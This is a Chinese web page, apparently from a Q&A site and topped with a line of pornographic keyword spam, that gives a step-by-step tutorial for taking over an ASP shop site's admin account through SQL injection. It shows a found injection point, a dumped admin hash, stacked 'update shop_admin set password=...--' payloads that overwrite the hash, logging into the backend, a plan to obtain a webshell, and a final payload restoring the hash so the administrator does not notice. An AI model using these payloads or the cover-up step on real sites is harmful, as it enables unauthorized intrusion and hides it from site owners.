日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁 > 云知道 > >

注入修改系統(tǒng)管理員密碼實用技巧

云知道

注入點已經(jīng)找到:xxx.com/book.asp?id=1996 我剛已經(jīng)用NB檢測過了 ??梢钥吹剑嬖诒矶?shop_admin 。
可是密碼是MD5加密的:[adminid]:24 [admin]:zhuyaod [passWord]:d4716077c2ba075c 我們來嘗試欺騙 ??梢钥闯觯垓_是沒戲滴 。那咋辦?難道要跑密碼?那得浪費多少時間和內(nèi)存???
下面我來介紹一種新方法:注射 。注射的語句如下: ;update shop_admin set password=’新MD5加密密碼’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密碼改成wmmhacker,我們首先要先獲得wmmhacker通過MD5加密后的十二位密碼 這里用明小子的工具就能轉(zhuǎn)換了 。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我們來測試 ??匆娏?,頁面沒有返回錯誤,表示成功了 。
現(xiàn)在我們對shop_admin表段下的密碼做重新解猜 。[adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家對比一下,已經(jīng)改變了 。現(xiàn)在我們可以登陸了 。進來了 。呵呵 。就到這里了吧 。值得提一句的是,我們進了后臺,然后想辦法拿到WEBSHELL 。
接著,別忘了把管理員密碼還原 。不然他會發(fā)現(xiàn)滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--
【注入修改系統(tǒng)管理員密碼實用技巧】

    推薦閱讀